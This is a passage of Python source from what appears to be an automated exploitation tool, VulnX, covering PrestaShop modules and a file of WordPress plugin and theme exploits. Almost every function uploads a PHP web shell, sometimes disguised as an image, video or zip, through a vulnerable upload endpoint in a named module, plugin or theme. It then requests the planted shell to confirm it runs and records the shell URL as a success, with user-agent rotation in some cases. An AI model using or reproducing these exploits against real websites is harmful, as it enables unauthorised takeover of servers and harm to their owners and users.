%s' %(que,vulnexploit,shellup)) 216 | else: 217 | print(' %s cartabandonmentpro_old%s' %(que , failexploit)) 218 | 219 | #videostab 220 | def videostab(url,headers): 221 | endpoint = url + "/modules/videostab/ajax_videostab.php?action=submitUploadVideo%26id_product=upload" 222 | img = open('shell/VulnX.php.mp4', 'rb') 223 | name_img= os.path.basename('shell/VulnX.php.mp4') 224 | files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'})} 225 | upload_file = Session.post(endpoint,files=files) 226 | shellup = url + "/modules/videostab/uploads/VulnX.php.mp4?Vuln=X" 227 | checkShell = requests.get(shellup).text 228 | statusCheck = re.findall(re.compile(r'Vuln X'),checkShell) 229 | if statusCheck: 230 | print(' %s videostab %s %s' %(que,vulnexploit,shellup)) 231 | else: 232 | print(' %s videostab %s' %(que , failexploit)) 233 | 234 | #wg24themeadministration 235 | def wg24themeadministration(url,headers): 236 | endpoint = url + "/modules//wg24themeadministration/wg24_ajax.php" 237 | img = open('shell/VulnX.php', 'rb') 238 | name_img= os.path.basename('shell/VulnX.php') 239 | files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}), 240 | 'type' : 'pattern_upload' } 241 | upload_file = Session.post(endpoint,files=files) 242 | shellup = url + "/modules/wg24themeadministration/img/upload/VulnX.php?Vuln=X" 243 | checkShell = requests.get(shellup).text 244 | statusCheck = re.findall(re.compile(r'Vuln X'),checkShell) 245 | if statusCheck: 246 | print(' %s wg24themeadmin %s %s' %(que,vulnexploit,shellup)) 247 | else: 248 | print(' %s wg24themeadmin %s' %(que , failexploit)) 249 | 250 | #fieldvmegamenu 251 | def fieldvmegamenu(url,headers): 252 | endpoint = url + "/modules/fieldvmegamenu/ajax/upload.php" 253 | img = open('shell/VulnX.php', 'rb') 254 | name_img= os.path.basename('shell/VulnX.php') 255 | fieldname = "image[]" 256 | files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'})} 257 | data = { fieldname : files } 258 | upload_file = Session.post(endpoint,data) 259 | shellup = url + "/modules/fieldvmegamenu/uploads/VulnX.php?Vuln=X" 260 | checkShell = requests.get(shellup).text 261 | statusCheck = re.findall(re.compile(r'Vuln X'),checkShell) 262 | if statusCheck: 263 | print(' %s fieldvmegamenu %s %s' %(que,vulnexploit,shellup)) 264 | else: 265 | print(' %s fieldvmegamenu %s' %(que , failexploit)) 266 | 267 | #wdoptionpanel 268 | def wdoptionpanel(url,headers): 269 | endpoint = url + "/modules/wdoptionpanel/wdoptionpanel_ajax.php" 270 | img = open('shell/VulnX.php', 'rb') 271 | name_img= os.path.basename('shell/VulnX.php') 272 | files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}), 273 | 'type' : 'pattern_upload' } 274 | upload_file = Session.post(endpoint,files=files) 275 | shellup = url + "/modules/wdoptionpanel/upload/VulnX.php?Vuln=X" 276 | checkShell = requests.get(shellup).text 277 | statusCheck = re.findall(re.compile(r'Vuln X'),checkShell) 278 | if statusCheck: 279 | print(' %s wdoptionpanel %s %s' %(que,vulnexploit,shellup)) 280 | else: 281 | print(' %s wdoptionpanel %s' %(que , failexploit)) 282 | 283 | #pk_flexmenu 284 | def pk_flexmenu(url,headers): 285 | endpoint = url + "/modules/pk_flexmenu/ajax/upload.php" 286 | img = open('shell/VulnX.php', 'rb') 287 | name_img= os.path.basename('shell/VulnX.php') 288 | fieldname = "image[]" 289 | files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'})} 290 | data = { fieldname : files } 291 | upload_file = Session.post(endpoint,data) 292 | shellup = url + "/modules/pk_flexmenu/uploads/VulnX.php?Vuln=X" 293 | checkShell = requests.get(shellup).text 294 | statusCheck = re.findall(re.compile(r'Vuln X'),checkShell) 295 | if statusCheck: 296 | print(' %s pk_flexmenu %s %s' %(que,vulnexploit,shellup)) 297 | else: 298 | print(' %s pk_flexmenu %s' %(que , failexploit)) 299 | 300 | #pk_vertflexmenu 301 | def pk_vertflexmenu(url,headers): 302 | endpoint = url + "/modules/pk_vertflexmenu/ajax/upload.php" 303 | img = open('shell/VulnX.php', 'rb') 304 | name_img= os.path.basename('shell/VulnX.php') 305 | fieldname = "image[]" 306 | files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'})} 307 | data = { fieldname : files } 308 | upload_file = Session.post(endpoint,data) 309 | shellup = url + "/modules/pk_vertflexmenu/uploads/VulnX.php?Vuln=X" 310 | checkShell = requests.get(shellup).text 311 | statusCheck = re.findall(re.compile(r'Vuln X'),checkShell) 312 | if statusCheck: 313 | print(' %s pk_flexmenu %s %s' %(que,vulnexploit,shellup)) 314 | else: 315 | print(' %s pk_flexmenu %s' %(que , failexploit)) 316 | 317 | #nvn_export_orders 318 | def nvn_export_orders(url,headers): 319 | endpoint = url + "/modules/nvn_export_orders/upload.php" 320 | img = open('shell/VulnX.php', 'rb') 321 | name_img= os.path.basename('shell/VulnX.php') 322 | fieldname = "image[]" 323 | files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'})} 324 | data = { fieldname : files } 325 | upload_file = Session.post(endpoint,data) 326 | shellup = url + "/modules/nvn_export_orders/nvn_extra_add.php?Vuln=X" 327 | checkShell = requests.get(shellup).text 328 | statusCheck = re.findall(re.compile(r'Vuln X'),checkShell) 329 | if statusCheck: 330 | print(' %s nvn_export_orders %s %s' %(que,vulnexploit,shellup)) 331 | else: 332 | print(' %s nvn_export_orders %s' %(que , failexploit)) 333 | 334 | #tdpsthemeoptionpanel 335 | def tdpsthemeoptionpanel(url,headers): 336 | endpoint = url + "/modules/tdpsthemeoptionpanel/tdpsthemeoptionpanelAjax.php" 337 | img = open('shell/VulnX.php', 'rb') 338 | name_img= os.path.basename('shell/VulnX.php') 339 | fieldname = "image[]" 340 | files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'})} 341 | data = { fieldname : files } 342 | upload_file = Session.post(endpoint,data) 343 | shellup = url + "/modules/tdpsthemeoptionpanel/upload/VulnX.php?Vuln=X" 344 | checkShell = requests.get(shellup).text 345 | statusCheck = re.findall(re.compile(r'Vuln X'),checkShell) 346 | if statusCheck: 347 | print(' %s tdpsthemeoptionpanel %s %s' %(que,vulnexploit,shellup)) 348 | else: 349 | print(' %s tdpsthemeoptionpanel %s' %(que , failexploit)) 350 | 351 | #masseditproduct 352 | def masseditproduct(url,headers): 353 | endpoint = url + "/modules/lib/redactor/file_upload.php" 354 | img = open('shell/VulnX.php', 'rb') 355 | name_img= os.path.basename('shell/VulnX.php') 356 | fieldname = "image[]" 357 | files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'})} 358 | data = { fieldname : files } 359 | upload_file = Session.post(endpoint,data) 360 | shellup = url + "/masseditproduct/uploads/file/VulnX.php?Vuln=X" 361 | checkShell = requests.get(shellup).text 362 | statusCheck = re.findall(re.compile(r'Vuln X'),checkShell) 363 | if statusCheck: 364 | print(' %s masseditproduct %s %s' %(que,vulnexploit,shellup)) 365 | else: 366 | print(' %s masseditproduct %s' %(que , failexploit)) -------------------------------------------------------------------------------- /modules/wpExploits.py: -------------------------------------------------------------------------------- 1 | import re 2 | import random 3 | import datetime 4 | import requests 5 | import os 6 | now = datetime.datetime.now() 7 | year = now.strftime('%Y') 8 | month= now.strftime('%m') 9 | 10 | Session = requests.Session() 11 | 12 | from common.colors import failexploit , vulnexploit , que , info , good 13 | # Blaze SlideShow 14 | def wp_blaze(url,headers,vulnresults): 15 | headers['Content_Type'] = 'multipart/form-data' 16 | #options to send 17 | options = { 18 | 'album_img':[open('shell/VulnX.php','rb')], 19 | 'task':'blaze_add_new_album', 20 | 'album_name':'', 21 | 'album_desc':'' 22 | } 23 | endpoint = url + "/wp-admin/admin.php?page=blaze_manage" 24 | #requests.post alias sendrequest method in common folder. 25 | content = requests.post(endpoint,options,headers).text 26 | check_blaze = re.findall("\/uploads\/blaze\/(.*?)\/big\/VulnX.php", content) 27 | if check_blaze: 28 | uploadfolder = check_blaze.group(1) 29 | dump_data = url + "/wp-content/uploads/blaze/"+uploadfolder+"/big/VulnX.php?Vuln=X" 30 | print (' %s Blaze SlideShow %s %s' %(que,vulnexploit,dump_data)) 31 | vulnresults.add('[SUCCESS] SlideShow -- Shell:' + dump_data) 32 | else: 33 | print (' %s Blaze SlideShow %s' %(que , failexploit)) 34 | vulnresults.add('[FAILED] SlideShow') 35 | # catpro method 36 | def wp_catpro(url,headers,vulnresults): 37 | headers['Content_Type'] = 'multipart/form-data' 38 | options = { 39 | 'album_img':[open('shell/VulnX.php','rb')], 40 | 'task':'cpr_add_new_album', 41 | 'album_name':'', 42 | 'album_desc':'' 43 | } 44 | endpoint = url + "/wp-admin/admin.php?page=catpro_manage" 45 | content = requests.post(endpoint,options,headers).text 46 | check_catpro = re.findall("\/uploads\/blaze\/(.*?)\/big\/VulnX.php", content) 47 | if check_catpro: 48 | uploadfolder = check_catpro.group(1) 49 | dump_data = url + "/wp-content/uploads/catpro/"+uploadfolder+"/big/VulnX.php?Vuln=X" 50 | print (' %s Catpro Plugin %s %s' %(que,vulnexploit,dump_data)) 51 | vulnresults.add('[SUCCESS] Catpro -- Shell:' + dump_data) 52 | else: 53 | print (' %s Catpro Plugin %s' %(que , failexploit)) 54 | vulnresults.add('[FAILED] Catpro') 55 | 56 | # CherryFramework Method 57 | def wp_cherry(url,headers,vulnresults): 58 | headers['Content_Type'] = 'multipart/form-data' 59 | options = { 60 | 'file':open('shell/VulnX.php','rb') 61 | } 62 | endpoint = url + "/wp-content/plugins/cherry-plugin/admin/import-export/upload.php" 63 | response = requests.post(endpoint,options,headers).text 64 | dump_data = url + "/wp-content/plugins/cherry-plugin/admin/import-export/VulnX.php?Vuln=X" 65 | content=requests.get(dump_data, headers).text 66 | check_cherry = re.findall("Vuln X", content) 67 | if check_cherry: 68 | print (' %s CherryFramework %s %s' %(que,vulnexploit,dump_data)) 69 | vulnresults.add('[SUCCESS] CherryFramework -- Shell:' + dump_data) 70 | else: 71 | print (' %s CherryFramework %s' %(que , failexploit)) 72 | vulnresults.add('[FAILED] CherryFramework') 73 | 74 | #Download Manager method 75 | def wp_dm(url,headers,vulnresults): 76 | headers['Content_Type'] = 'multipart/form-data' 77 | options = { 78 | 'upfile':open('shell/VulnX.php','rb'), 79 | 'dm_upload':'' 80 | } 81 | send_shell = requests.post(url,options,headers).text 82 | dump_data = url + "/wp-content/plugins/downloads-manager/upload/VulnX.php?Vuln=X" 83 | content=requests.get(dump_data,headers).text 84 | check_dm = re.findall("Vuln X", content) 85 | if check_dm: 86 | print (' %s Download Manager %s %s' %(que,vulnexploit,dump_data)) 87 | vulnresults.add('[SUCCESS] Download Manager -- Shell:' + dump_data) 88 | else: 89 | print (' %s Download Manager %s' %(que , failexploit)) 90 | vulnresults.add('[FAILED] Download Manager') 91 | 92 | #powerzoomer method 93 | def wp_powerzoomer(url,headers,vulnresults): 94 | endpoint = url + "/wp-admin/admin.php?page=powerzoomer_manage" 95 | headers['Content_Type'] = 'multipart/form-data' 96 | options = { 97 | 'album_img':[open('shell/VulnX.php','rb')], 98 | 'task':'pwz_add_new_album', 99 | 'album_name':'', 100 | 'album_desc':'' 101 | } 102 | response = requests.post(endpoint,options,headers).text 103 | check_powerzoomer = re.findall("\/uploads\/powerzoomer\/(.*?)\/big\/VulnX.php", response) 104 | if check_powerzoomer: 105 | uploadfolder = check_powerzoomer.group(1) 106 | dump_data = url + "/wp-content/uploads/powerzoomer/"+uploadfolder+"/big/VulnX.php?Vuln=X" 107 | print (' %s Powerzoomer %s %s' %(que,vulnexploit,dump_data)) 108 | vulnresults.add('[SUCCESS] Powerzoomer -- Shell:' + dump_data) 109 | else: 110 | print (' %s Powerzoomer %s' %(que , failexploit)) 111 | vulnresults.add('[FAILED] Powerzoomer') 112 | 113 | # wp_revslider method 114 | def wp_revslider(url,headers,vulnresults): 115 | endpoint = url + "/wp-admin/admin-ajax.php" 116 | headers={ 117 | 'Cookie':'', 118 | 'Content_Type' : 'form-data', 119 | 'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31' 120 | } 121 | options = { 122 | 'action':'revslider_ajax_action', 123 | 'client_action':'update_plugin', 124 | 'update_file':[open('shell/VulnX.zip','rb')] 125 | } 126 | send_shell = requests.post(endpoint,options,headers).text 127 | revslidera=requests.post(url+"/wp-content/plugins/revslider/temp/update_extract/revslider/VulnX.php", headers).text 128 | revsliderb=requests.get(url+"/wp-content/themes/Avada/framework/plugins/revslider/temp/update_extract/revslider/VulnX.php", headers).text 129 | revsliderc=requests.get(url+"/wp-content/themes/striking_r/framework/plugins/revslider/temp/update_extract/revslider/VulnX.php", headers).text 130 | revsliderd=requests.get(url+"/wp-content/themes/IncredibleWP/framework/plugins/revslider/temp/update_extract/revslider/VulnX.php", headers).text 131 | revslidere=requests.get(url+"/wp-content/themes/ultimatum/wonderfoundry/addons/plugins/revslider/temp/update_extract/revslid.texter/VulnX.php", headers).text 132 | revsliderf=requests.get(url+"/wp-content/themes/medicate/script/revslider/temp/update_extract/revslider/VulnX.php", headers).text 133 | revsliderg=requests.get(url+"/wp-content/themes/centum/revslider/temp/update_extract/revslider/VulnX.php", headers).text 134 | revsliderh=requests.get(url+"/wp-content/themes/beach_apollo/advance/plugins/revslider/temp/update_extract/revslider/VulnX.php", headers).text 135 | revslideri=requests.get(url+"/wp-content/themes/cuckootap/framework/plugins/revslider/temp/update_extract/revslider/VulnX.php", headers).text 136 | revsliderj=requests.get(url+"/wp-content/themes/pindol/revslider/temp/update_extract/revslider/VulnX.php", headers).text 137 | revsliderk=requests.get(url+"/wp-content/themes/designplus/framework/plugins/revslider/temp/update_extract/revslider/VulnX.php", headers).text 138 | revsliderl=requests.get(url+"/wp-content/themes/rarebird/framework/plugins/revslider/temp/update_extract/revslider/VulnX.php", headers).text 139 | revsliderm=requests.get(url+"/wp-content/themes/andre/framework/plugins/revslider/temp/update_extract/revslider/VulnX.php", headers).text 140 | check_revslidera = re.findall("Vuln X", revslidera) 141 | check_revsliderb = re.findall("Vuln X", revsliderb) 142 | check_revsliderc = re.findall("Vuln X", revsliderc) 143 | check_revsliderd = re.findall("Vuln X", revsliderd) 144 | check_revslidere = re.findall("Vuln X", revslidere) 145 | check_revsliderf = re.findall("Vuln X", revsliderf) 146 | check_revsliderg = re.findall("Vuln X", revsliderg) 147 | check_revsliderh = re.findall("Vuln X", revsliderh) 148 | check_revslideri = re.findall("Vuln X", revslideri) 149 | check_revsliderj = re.findall("Vuln X", revsliderj) 150 | check_revsliderk = re.findall("Vuln X", revsliderk) 151 | check_revsliderl = re.findall("Vuln X", revsliderl) 152 | check_revsliderm = re.findall("Vuln X", revsliderm) 153 | dump_data = "" 154 | if check_revslidera: 155 | print (' %s Revslider Plugin %s' %(que,vulnexploit)) 156 | print (' %s Injected Successfully \n %s %s' % ( good,info,dump_data)) 157 | vulnresults.add('[SUCCESS] Revslider -- Shell:' + url+"/wp-content/plugins/revslider/temp/update_extract/revslider/VulnX.php?Vuln=X") 158 | elif check_revsliderb: 159 | print (' %s Revslider Plugin %s' %(que,vulnexploit)) 160 | print (' %s Injected Successfully \n %s %s' % ( good,info,dump_data)) 161 | vulnresults.add('[SUCCESS] Revslider -- Shell:' + url+"/wp-content/themes/Avada/framework/plugins/revslider/temp/update_extract/revslider/VulnX.php?Vuln=X") 162 | elif check_revsliderc: 163 | print (' %s Revslider Plugin %s' %(que,vulnexploit)) 164 | print (' %s Injected Successfully \n %s %s' % ( good,info,dump_data)) 165 | vulnresults.add('[SUCCESS] Revslider -- Shell:' + url+"/wp-content/themes/striking_r/framework/plugins/revslider/temp/update_extract/revslider/VulnX.php?Vuln=X") 166 | elif check_revsliderd: 167 | print (' %s Revslider Plugin %s' %(que,vulnexploit)) 168 | print (' %s Injected Successfully \n %s %s' % ( good,info,dump_data)) 169 | vulnresults.add('[SUCCESS] Revslider -- Shell:' + url+"/wp-content/themes/IncredibleWP/framework/plugins/revslider/temp/update_extract/revslider/VulnX.php?Vuln=X") 170 | elif check_revslidere: 171 | print (' %s Revslider Plugin %s' %(que,vulnexploit)) 172 | print (' %s Injected Successfully \n %s %s' % ( good,info,dump_data)) 173 | vulnresults.add('[SUCCESS] Revslider -- Shell:' + url+"/wp-content/themes/ultimatum/wonderfoundry/addons/plugins/revslider/temp/update_extract/revslider/VulnX.php?Vuln=X") 174 | elif check_revsliderf: 175 | print (' %s Revslider Plugin %s' %(que,vulnexploit)) 176 | print (' %s Injected Successfully \n %s %s' % ( good,info,dump_data)) 177 | vulnresults.add('[SUCCESS] Revslider -- Shell:' + url+"/wp-content/themes/medicate/script/revslider/temp/update_extract/revslider/VulnX.php?Vuln=X") 178 | elif check_revsliderg: 179 | print (' %s Revslider Plugin %s' %(que,vulnexploit)) 180 | print (' %s Injected Successfully \n %s %s' % ( good,info,dump_data)) 181 | vulnresults.add('[SUCCESS] Revslider -- Shell:' + url+"/wp-content/themes/centum/revslider/temp/update_extract/revslider/VulnX.php?Vuln=X") 182 | elif check_revsliderh: 183 | print (' %s Revslider Plugin %s' %(que,vulnexploit)) 184 | print (' %s Injected Successfully \n %s %s' % ( good,info,dump_data)) 185 | vulnresults.add('[SUCCESS] Revslider -- Shell:' + url+"/wp-content/themes/beach_apollo/advance/plugins/revslider/temp/update_extract/revslider/VulnX.php?Vuln=X") 186 | elif check_revslideri: 187 | print (' %s Revslider Plugin %s' %(que,vulnexploit)) 188 | print (' %s Injected Successfully \n %s %s' % ( good,info,dump_data)) 189 | vulnresults.add('[SUCCESS] Revslider -- Shell:' + url+"/wp-content/themes/cuckootap/framework/plugins/revslider/temp/update_extract/revslider/VulnX.php?Vuln=X") 190 | elif check_revsliderj: 191 | print (' %s Revslider Plugin %s' %(que,vulnexploit)) 192 | print (' %s Injected Successfully \n %s %s' % ( good,info,dump_data)) 193 | vulnresults.add('[SUCCESS] Revslider -- Shell:' + url+"/wp-content/themes/pindol/revslider/temp/update_extract/revslider/VulnX.php?Vuln=X") 194 | elif check_revsliderk: 195 | print (' %s Revslider Plugin %s' %(que,vulnexploit)) 196 | print (' %s Injected Successfully \n %s %s' % ( good,info,dump_data)) 197 | vulnresults.add('[SUCCESS] Revslider -- Shell:' + url+"/wp-content/themes/designplus/framework/plugins/revslider/temp/update_extract/revslider/VulnX.php?Vuln=X") 198 | elif check_revsliderl: 199 | print (' %s Revslider Plugin %s' %(que,vulnexploit)) 200 | print (' %s Injected Successfully \n %s %s' % ( good,info,dump_data)) 201 | vulnresults.add('[SUCCESS] Revslider -- Shell:' + url+"/wp-content/themes/rarebird/framework/plugins/revslider/temp/update_extract/revslider/VulnX.php?Vuln=X") 202 | elif check_revsliderm: 203 | print (' %s Revslider Plugin %s' %(que,vulnexploit)) 204 | print (' %s Injected Successfully \n %s %s' % ( good,info,dump_data)) 205 | vulnresults.add('[SUCCESS] Revslider -- Shell:' + url+"/wp-content/themes/andre/framework/plugins/revslider/temp/update_extract/revslider/VulnX.php?Vuln=X") 206 | else: 207 | print (' %s Revslider %s' %(que , failexploit)) 208 | vulnresults.add('[FAILED] Revslider') 209 | 210 | # Formcraft 211 | def wp_fromcraft(url,headers,vulnresults): 212 | shell = open('shell/VulnX.php','rb') 213 | fields= "files[]" 214 | headers['Content_Type'] = 'multipart/form-data' 215 | options = { 216 | fields:shell 217 | } 218 | endpoint = url + "/wp-content/plugins/formcraft/file-upload/server/php/" 219 | response = requests.post(endpoint,options,headers).text 220 | dump_data = url + "/wp-content/plugins/formcraft/file-upload/server/php/files/VulnX.php?Vuln=X" 221 | check_fromcraft = re.findall("\"files", response) 222 | if check_fromcraft: 223 | print (' %s Formcraft %s %s' %(que,vulnexploit,dump_data)) 224 | vulnresults.add('[SUCCESS] Formcraft -- Shell:' + dump_data) 225 | else: 226 | print (' %s Formcraft %s' %(que , failexploit)) 227 | vulnresults.add('[FAILED] Formcraft') 228 | # Job Manager 229 | def wp_jobmanager(url,headers,vulnresults): 230 | endpoint = url + "/jm-ajax/upload_file/" 231 | image = open('shell/VulnX.gif','rb') 232 | field = "file[]" 233 | headers['content-type'] = 'multipart/form-data' 234 | options = { 235 | field:image 236 | } 237 | 238 | send_image = requests.post(endpoint,options,headers).text 239 | dump_data = url + "/wp-content/uploads/job-manager-uploads/file/"+year+"/"+month+"/VulnX.gif" 240 | response=requests.get(dump_data, headers) 241 | res = response.headers['content-type'] 242 | check_jobmanager = re.findall("image\/gif", res) 243 | 244 | if check_jobmanager: 245 | print (' %s Job Manager %s %s' %(que,vulnexploit,dump_data)) 246 | vulnresults.add('[SUCCESS] Job Manager -- Shell:' + dump_data) 247 | else: 248 | print (' %s Job Manager %s' %(que , failexploit)) 249 | vulnresults.add('[FAILED] Job Manager') 250 | 251 | # Showbiz Pro 252 | def wp_showbiz(url,headers,vulnresults): 253 | endpoint = url + "/wp-admin/admin-ajax.php" 254 | #method to randomize the user agent [functionINfunction] 255 | def random_UserAgent(): 256 | useragents_rotate = [ 257 | "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0", 258 | "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0", 259 | "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)", 260 | "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", 261 | "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", 262 | "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31" 263 | ] 264 | useragents_random = random.choice(useragents_rotate) 265 | return useragents_random 266 | useragent=random_UserAgent() 267 | headers['User-Agent'] = useragent 268 | headers['Content_Type'] = 'multipart/form-data' 269 | options = { 270 | "action":"showbiz_ajax_action", 271 | "client_action":"update_plugin", 272 | "update_file":[open('shell/VulnX.php','rb')] 273 | } 274 | send_shell = requests.post(endpoint,options,headers).text 275 | dump_data = url + "/wp-content/plugins/showbiz/temp/update_extract/VulnX.php?Vuln=X" 276 | res=requests.get(dump_data, options).text 277 | check_showbiz = re.findall("Vuln X", res) 278 | if check_showbiz: 279 | print (' %s Showbiz Pro %s %s' %(que,vulnexploit,dump_data)) 280 | vulnresults.add('[SUCCESS] Showbiz Pro -- Shell:' + dump_data) 281 | else: 282 | print (' %s Showbiz Pro %s' %(que , failexploit)) 283 | vulnresults.add('[FAILED] Showbiz Pro') 284 | # Synoptic method 285 | def wp_synoptic(url,headers,vulnresults): 286 | endpoint = url + "/wp-content/themes/synoptic/lib/avatarupload/upload.php" 287 | #shell directory 288 | shell = open('shell/VulnX.php','rb') 289 | field = "qqfile" 290 | headers['Content_Type'] = 'multipart/form-data' 291 | options = { 292 | field:shell 293 | } 294 | send_shell = requests.post(endpoint,options,headers).text 295 | dump_data = url + "/wp-content/uploads/markets/avatars/VulnX.php?Vuln=X" 296 | res=requests.get(dump_data, headers).text 297 | check_synoptic = re.findall("Vuln X", res) 298 | 299 | if check_synoptic : 300 | print (' %s Synoptic %s %s' %(que,vulnexploit,dump_data)) 301 | vulnresults.add('[SUCCESS] Synoptic -- Shell:' + dump_data) 302 | else: 303 | print (' %s Synoptic %s' %(que , failexploit)) 304 | vulnresults.add('[FAILED] Synoptic') 305 | 306 | # WPshop eCommerce method 307 | def wp_shop(url,headers,vulnresults): 308 | endpoint = url + "/wp-content/plugins/wpshop/includes/ajax.php?elementCode=ajaxUpload" 309 | shell = open('shell/VulnX.php','rb') 310 | field = "wpshop_file" 311 | headers['Content_Type'] = 'multipart/form-data' 312 | options = { 313 | field:shell 314 | } 315 | send_shell = requests.post(endpoint,options,headers).text 316 | dump_data = url + "/wp-content/uploads/VulnX.php?Vuln=X" 317 | res=requests.get(dump_data, headers).text 318 | check_shop = re.findall("Vuln X", res) 319 | if check_shop: 320 | print (' %s WPshop eCommerce %s %s' %(que,vulnexploit,dump_data)) 321 | vulnresults.add('[SUCCESS] WPshop eCommerce -- Shell:' + dump_data) 322 | else: 323 | print (' %s WPshop eCommerce %s' %(que , failexploit)) 324 | vulnresults.add('[FAILED] WPshop eCommerce') 325 | 326 | # Simple Ads Manager 327 | def wp_adsmanager(url,headers,vulnresults): 328 | endpoint = url + "/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php" 329 | shell = open('shell/VulnX.php','rb') 330 | field = "wpshop_file" 331 | headers['Content_Type'] = 'multipart/form-data' 332 | options = { 333 | 'uploadfile':shell, 334 | 'action':'upload_ad_image', 335 | 'path':'' 336 | } 337 | send_shell = requests.post(endpoint,options,headers).text 338 | dump_data = url + "/wp-content/plugins/simple-ads-manager/VulnX.php?Vuln=X/" 339 | res=requests.get(dump_data, headers).text 340 | check_adsmanager = re.findall("{\"status\":\"success\"}", res) 341 | if check_adsmanager: 342 | print (' %s Simple Ads Manager %s %s' %(que,vulnexploit,dump_data)) 343 | vulnresults.add('[SUCCESS] Simple Ads Manager -- Shell:' + dump_data) 344 | else: 345 | print (' %s Simple Ads Manager %s' %(que , failexploit)) 346 | vulnresults.add('[FAILED] Simple Ads Manager') 347 | 348 | # Wysija Newsletters 349 | def wp_wysija(url,headers,vulnresults): 350 | theme = "my-theme" 351 | endpoint = url + "/wp-admin/admin-post.php?page=wysija_campaigns&action=themes" 352 | shell = open('shell/VulnX.php','rb') 353 | 354 | field = "wpshop_file" 355 | headers['User-Agent'] = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31' 356 | headers['Content_Type'] = 'form-data' 357 | options = { 358 | 'theme':shell, 359 | 'overwriteexistingtheme':'on', 360 | 'action':'themeupload', 361 | 'submitter':'Upload' 362 | } 363 | send_shell = requests.post(endpoint,options,headers).text 364 | dump_data = url + "/wp-content/uploads/wysija/themes/VulnX/VulnX.php?Vuln=X" 365 | res=requests.get(dump_data, headers).text 366 | check_wysija = re.findall("Vuln X", res) 367 | if check_wysija: 368 | print (' %s Wysija Newsletters %s %s' %(que,vulnexploit,dump_data)) 369 | vulnresults.add('[SUCCESS] Wysija Newsletters -- Shell:' + dump_data) 370 | else: 371 | print (' %s Wysija Newsletters %s' %(que , failexploit)) 372 | vulnresults.add('[FAILED] Wysija Newsletters') 373 | 374 | # InBoundio Marketing 375 | def wp_inboundiomarketing(url,headers,vulnresults): 376 | endpoint = url + "/wp-content/plugins/inboundio-marketing/admin/partials/csv_uploader.php" 377 | shell = open('shell/VulnX.php','rb') 378 | headers['Content_Type'] = 'multipart/form-data' 379 | options = { 380 | 'file':shell, 381 | } 382 | send_shell = requests.post(endpoint,options,headers).text 383 | dump_data = url + "/wp-content/plugins/inboundio-marketing/admin/partials/uploaded_csv/VulnX.php?Vuln=X" 384 | res=requests.get(dump_data, headers).text 385 | check_wysija = re.findall("Vuln X", res) 386 | if check_wysija: 387 | print (' %s InBoundio Marketing %s %s' %(que,vulnexploit,dump_data)) 388 | vulnresults.add('[SUCCESS] InBoundio Marketing -- Shell:' + dump_data) 389 | else: 390 | print (' %s InBoundio Marketing %s' %(que , failexploit)) 391 | vulnresults.add('[FAILED] InBoundio Marketing') 392 | 393 | # AdBlocker 394 | def wp_adblockblocker(url,headers,vulnresults): 395 | endpoint = url + "/wp-admin/admin-ajax.php?action=getcountryuser&cs=2" 396 | shell = open('shell/VulnX.php','rb') 397 | headers['Content_Type'] = 'multipart/form-data' 398 | options = { 399 | 'popimg':shell, 400 | } 401 | send_shell = requests.post(endpoint,options,headers).text 402 | dump_data = url + "/wp-content/uploads/"+year+"/"+month+"/VulnX.php?Vuln=X" 403 | res=requests.get(dump_data, headers).text 404 | if re.findall("Vuln X", res): 405 | print (' %s adblockblocker %s %s' %(que,vulnexploit,dump_data)) 406 | vulnresults.add('[SUCCESS] adblockblocker -- Shell:' + dump_data) 407 | else: 408 | print (' %s adblockblocker %s' %(que , failexploit)) 409 | vulnresults.add('[FAILED] adblockblocker') 410 | 411 | # levoslideshow 412 | def wp_levoslideshow(url,headers,vulnresults): 413 | endpoint = url + "/wp-admin/admin.php?page=levoslideshow_manage" 414 | shell = open('shell/VulnX.php','rb') 415 | headers['Content_Type'] = 'multipart/form-data' 416 | options = { 417 | 'album_img':shell, 418 | 'task' : 'lvo_add_new_album', 419 | 'album_name': '', 420 | 'album_desk': '', 421 | } 422 | send_shell = requests.post(endpoint,options,headers).text 423 | check = re.findall("/uploads/levoslideshow/(.*?)/big/VulnX.php/", send_shell) 424 | if check: 425 | dump_data = url + "/wp-content/uploads/levoslideshow/"+check.group(1)+"/big/VulnX.php?Vuln=X" 426 | print (' %s levoslideshow %s %s' %(que,vulnexploit,dump_data)) 427 | vulnresults.add('[SUCCESS] levoslideshow -- Shell:' + dump_data) 428 | else: 429 | print (' %s levoslideshow %s' %(que , failexploit)) 430 | vulnresults.add('[FAILED] levoslideshow') 431 | 432 | #responsive_thumbnail_slider : exploit data = 27-07-2018 433 | def wp_thumbnailSlider(url,headers): 434 | endpoint = url + "wp-admin/admin.php?page=responsive_thumbnail_slider_image_management" 435 | with open('shell/Vulnx.gif', 'rb') as img: 436 | name_img= os.path.basename('shell/Vulnx.gif') 437 | files= {'image': (name_img,img,'multipart/form-data',{'Expires': '0'}) } 438 | upload_file = Session.post(url,files=files) 439 | fname = re.findall(re.compile(r'/slider\/(.*\.gif)/'),upload_file) 440 | if fname: 441 | dump_data = url + "wp-content/uploads/wp-responsive-images-thumbnail-slider/"+fname 442 | print (' %s thumbnail-slider %s %s' %(que,vulnexploit,dump_data)) 443 | else: 444 | print (' %s 